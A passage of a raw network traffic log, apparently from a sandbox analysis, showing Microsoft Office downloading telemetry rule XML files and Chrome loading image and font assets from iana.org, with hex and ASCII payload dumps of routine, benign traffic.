                            2024-10-10 08:17:48 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                            Session IDSource IPSource PortDestination IPDestination Port
                            29192.168.2.44979113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:48 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:48 UTC563INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:48 GMT
                            Content-Type: text/xml
                            Content-Length: 2160
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                            ETag: "0x8DC582BA3B95D81"
                            x-ms-request-id: c8ae7944-b01e-0002-48f9-191b8f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081748Z-185b7d577bdfx2dd0gsb231cq0000000027000000000080e
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:48 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.449771192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:48 UTC576OUTGET /about/excellence/efqm-committed-2013.svg HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:48 UTC1051INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:48 GMT
                            Server: Apache
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            Last-Modified: Sun, 18 Jul 2021 22:53:48 GMT
                            Content-Length: 22682
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, max-age=3600
                            Expires: Thu, 10 Oct 2024 09:17:48 GMT
                            Content-Type: image/svg+xml
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:48 UTC5803INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 31 37 2e 30 2e 30 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30 29 20 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0a 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?>... Generator: Adobe Illustrator 17.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id=
                            2024-10-10 08:17:48 UTC1667INData Raw: 2d 30 2e 32 30 31 2d 30 2e 31 39 37 2d 30 2e 33 30 31 2d 30 2e 34 33 36 2d 30 2e 33 30 31 2d 30 2e 37 31 37 63 30 2d 30 2e 32 39 32 2c 30 2e 31 2d 30 2e 35 33 37 2c 30 2e 33 30 31 2d 30 2e 37 33 33 0a 09 09 63 30 2e 32 30 31 2d 30 2e 31 39 36 2c 30 2e 34 34 36 2d 30 2e 32 39 35 2c 30 2e 37 33 36 2d 30 2e 32 39 35 63 30 2e 32 39 2c 30 2c 30 2e 35 33 38 2c 30 2e 30 39 39 2c 30 2e 37 34 34 2c 30 2e 32 39 35 43 35 36 2e 32 36 37 2c 38 37 2e 35 34 36 2c 35 36 2e 33 37 2c 38 37 2e 37 39 31 2c 35 36 2e 33 37 2c 38 38 2e 30 38 33 7a 20 4d 35 36 2e 31 31 37 2c 39 38 2e 39 35 37 0a 09 09 68 2d 31 2e 35 38 35 76 2d 37 2e 39 39 31 68 31 2e 35 38 35 56 39 38 2e 39 35 37 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 32 33 31 46 32 30 22 20 64 3d 22 4d 36 32
                            Data Ascii: -0.201-0.197-0.301-0.436-0.301-0.717c0-0.292,0.1-0.537,0.301-0.733c0.201-0.196,0.446-0.295,0.736-0.295c0.29,0,0.538,0.099,0.744,0.295C56.267,87.546,56.37,87.791,56.37,88.083z M56.117,98.957h-1.585v-7.991h1.585V98.957z"/><path fill="#231F20" d="M62
                            2024-10-10 08:17:48 UTC4080INData Raw: 30 37 2d 30 2e 32 30 38 2c 31 2e 30 35 33 2d 30 2e 33 31 32 2c 31 2e 36 33 39 2d 30 2e 33 31 32 63 30 2e 35 38 36 2c 30 2c 31 2e 31 31 38 2c 30 2e 30 39 36 2c 31 2e 35 39 37 2c 30 2e 32 38 37 63 30 2e 34 37 39 2c 30 2e 31 39 31 2c 30 2e 38 38 34 2c 30 2e 34 36 36 2c 31 2e 32 31 36 2c 30 2e 38 32 36 0a 09 09 63 30 2e 33 33 32 2c 30 2e 33 36 2c 30 2e 35 38 38 2c 30 2e 37 39 35 2c 30 2e 37 36 39 2c 31 2e 33 30 37 43 37 36 2e 35 39 34 2c 39 33 2e 36 37 37 2c 37 36 2e 36 38 34 2c 39 34 2e 32 35 34 2c 37 36 2e 36 38 34 2c 39 34 2e 38 39 34 7a 20 4d 37 35 2e 30 36 36 2c 39 34 2e 32 35 34 0a 09 09 63 2d 30 2e 30 31 31 2d 30 2e 33 31 35 2d 30 2e 30 36 35 2d 30 2e 36 31 2d 30 2e 31 36 2d 30 2e 38 38 35 63 2d 30 2e 30 39 36 2d 30 2e 32 37 35 2d 30 2e 32 33 36 2d 30
                            Data Ascii: 07-0.208,1.053-0.312,1.639-0.312c0.586,0,1.118,0.096,1.597,0.287c0.479,0.191,0.884,0.466,1.216,0.826c0.332,0.36,0.588,0.795,0.769,1.307C76.594,93.677,76.684,94.254,76.684,94.894z M75.066,94.254c-0.011-0.315-0.065-0.61-0.16-0.885c-0.096-0.275-0.236-0
                            2024-10-10 08:17:48 UTC251INData Raw: 30 2e 31 36 2d 30 2e 38 38 35 63 2d 30 2e 30 39 36 2d 30 2e 32 37 35 2d 30 2e 32 33 36 2d 30 2e 35 31 34 2d 30 2e 34 32 31 2d 30 2e 37 31 36 63 2d 30 2e 31 38 36 2d 30 2e 32 30 33 2d 30 2e 34 31 36 2d 30 2e 33 36 33 2d 30 2e 36 39 31 2d 30 2e 34 38 31 0a 09 09 63 2d 30 2e 32 37 35 2d 30 2e 31 31 37 2d 30 2e 35 39 38 2d 30 2e 31 37 37 2d 30 2e 39 36 39 2d 30 2e 31 37 37 63 2d 30 2e 33 33 38 2c 30 2d 30 2e 36 35 35 2c 30 2e 30 35 39 2d 30 2e 39 35 33 2c 30 2e 31 37 37 63 2d 30 2e 32 39 38 2c 30 2e 31 31 38 2d 30 2e 35 35 36 2c 30 2e 32 37 38 2d 30 2e 37 37 36 2c 30 2e 34 38 31 0a 09 09 63 2d 30 2e 32 31 39 2c 30 2e 32 30 32 2d 30 2e 33 39 39 2c 30 2e 34 34 31 2d 30 2e 35 34 2c 30 2e 37 31 36 63 2d 30 2e 31 34 2c 30 2e 32 37 35 2d 30 2e 32 32 32
                            Data Ascii: 0.16-0.885c-0.096-0.275-0.236-0.514-0.421-0.716c-0.186-0.203-0.416-0.363-0.691-0.481c-0.275-0.117-0.598-0.177-0.969-0.177c-0.338,0-0.655,0.059-0.953,0.177c-0.298,0.118-0.556,0.278-0.776,0.481c-0.219,0.202-0.399,0.441-0.54,0.716c-0.14,0.275-0.222
                            2024-10-10 08:17:48 UTC8000INData Raw: 2c 30 2e 35 37 2d 30 2e 32 34 34 2c 30 2e 38 38 35 48 31 31 38 2e 36 37 38 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 32 33 31 46 32 30 22 20 64 3d 22 4d 31 32 34 2e 31 30 37 2c 39 34 2e 37 35 39 6c 2d 32 2e 39 31 37 2d 33 2e 37 39 33 68 31 2e 39 35 36 6c 31 2e 39 35 35 2c 32 2e 37 34 38 6c 31 2e 39 37 33 2d 32 2e 37 34 38 68 31 2e 38 35 34 6c 2d 32 2e 38 38 33 2c 33 2e 37 37 36 6c 33 2e 32 32 2c 34 2e 32 31 35 68 2d 31 2e 39 37 32 0a 09 09 6c 2d 32 2e 32 32 36 2d 33 2e 31 31 39 6c 2d 32 2e 32 35 39 2c 33 2e 31 31 39 68 2d 31 2e 39 30 35 4c 31 32 34 2e 31 30 37 2c 39 34 2e 37 35 39 7a 22 2f 3e 0a 09 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 32 33 31 46 32 30 22 20 64 3d 22 4d 31 33 36 2e 30 32 35 2c 39 32 2e 39 38 39 63 2d 30 2e 31 36 38 2d 30
                            Data Ascii: ,0.57-0.244,0.885H118.678z"/><path fill="#231F20" d="M124.107,94.759l-2.917-3.793h1.956l1.955,2.748l1.973-2.748h1.854l-2.883,3.776l3.22,4.215h-1.972l-2.226-3.119l-2.259,3.119h-1.905L124.107,94.759z"/><path fill="#231F20" d="M136.025,92.989c-0.168-0
                            2024-10-10 08:17:48 UTC2881INData Raw: 2e 34 35 2d 30 2e 30 36 37 2c 30 2e 38 36 2d 30 2e 30 36 37 2c 31 2e 32 33 31 63 30 2c 30 2e 33 38 32 2c 30 2e 30 32 32 2c 30 2e 38 30 31 2c 30 2e 30 36 37 2c 31 2e 32 35 36 0a 09 09 63 30 2e 30 34 35 2c 30 2e 34 35 36 2c 30 2e 31 33 32 2c 30 2e 38 37 37 2c 30 2e 32 36 32 2c 31 2e 32 36 35 63 30 2e 31 32 39 2c 30 2e 33 38 38 2c 30 2e 33 31 31 2c 30 2e 37 31 34 2c 30 2e 35 34 38 2c 30 2e 39 37 38 63 30 2e 32 33 36 2c 30 2e 32 36 34 2c 30 2e 35 33 39 2c 30 2e 33 39 36 2c 30 2e 39 31 2c 30 2e 33 39 36 0a 09 09 63 30 2e 33 37 31 2c 30 2c 30 2e 36 37 32 2d 30 2e 31 33 32 2c 30 2e 39 30 33 2d 30 2e 33 39 36 63 30 2e 32 33 2d 30 2e 32 36 34 2c 30 2e 34 30 37 2d 30 2e 35 39 2c 30 2e 35 33 31 2d 30 2e 39 37 38 63 30 2e 31 32 33 2d 30 2e 33 38 38 2c 30 2e 32 30 37
                            Data Ascii: .45-0.067,0.86-0.067,1.231c0,0.382,0.022,0.801,0.067,1.256c0.045,0.456,0.132,0.877,0.262,1.265c0.129,0.388,0.311,0.714,0.548,0.978c0.236,0.264,0.539,0.396,0.91,0.396c0.371,0,0.672-0.132,0.903-0.396c0.23-0.264,0.407-0.59,0.531-0.978c0.123-0.388,0.207


                            Session IDSource IPSource PortDestination IPDestination Port
                            31192.168.2.44979813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:49 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:49 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:49 GMT
                            Content-Type: text/xml
                            Content-Length: 474
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                            ETag: "0x8DC582B9964B277"
                            x-ms-request-id: 95652421-c01e-00a1-30d1-197e4a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081749Z-185b7d577bdvng2dzp910e3fdc00000002e0000000000q8z
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:49 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            32192.168.2.44979613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:49 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:49 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:49 GMT
                            Content-Type: text/xml
                            Content-Length: 415
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                            ETag: "0x8DC582B9F6F3512"
                            x-ms-request-id: ed02cc85-901e-0015-15f6-19b284000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081749Z-185b7d577bdvng2dzp910e3fdc000000027000000000gf8w
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:49 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                            Session IDSource IPSource PortDestination IPDestination Port
                            33192.168.2.44979713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:49 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:49 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:49 GMT
                            Content-Type: text/xml
                            Content-Length: 467
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                            ETag: "0x8DC582BA6C038BC"
                            x-ms-request-id: 12b19b31-d01e-0028-077c-1a7896000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081749Z-185b7d577bdhgg84qrpnm2d6w000000002600000000027vf
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:49 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            34192.168.2.44979513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:49 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:49 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:49 GMT
                            Content-Type: text/xml
                            Content-Length: 632
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                            ETag: "0x8DC582BB6E3779E"
                            x-ms-request-id: 93ca84ad-001e-0014-016e-1a5151000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081749Z-185b7d577bd6tsgdmpfvwsf42g000000017000000000fhbg
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:49 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                            Session IDSource IPSource PortDestination IPDestination Port
                            35192.168.2.44979413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:49 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:49 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:49 GMT
                            Content-Type: text/xml
                            Content-Length: 471
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                            ETag: "0x8DC582BB10C598B"
                            x-ms-request-id: 1633ae45-701e-006f-7504-1aafc4000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081749Z-185b7d577bdfx2dd0gsb231cq0000000027000000000081f
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:49 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.449800192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:49 UTC595OUTGET /_img/2022/fonts/NotoSans-Regular.woff HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: http://www.iana.org
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://www.iana.org/_css/2022/iana_website.css
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:49 UTC1078INHTTP/1.1 200 OK
                            Date: Wed, 09 Oct 2024 18:25:31 GMT
                            Server: Apache
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 157504
                            X-Content-Type-Options: nosniff
                            Vary: Accept-Encoding
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Cache-Control: public, s-maxage=86402, max-age=604814
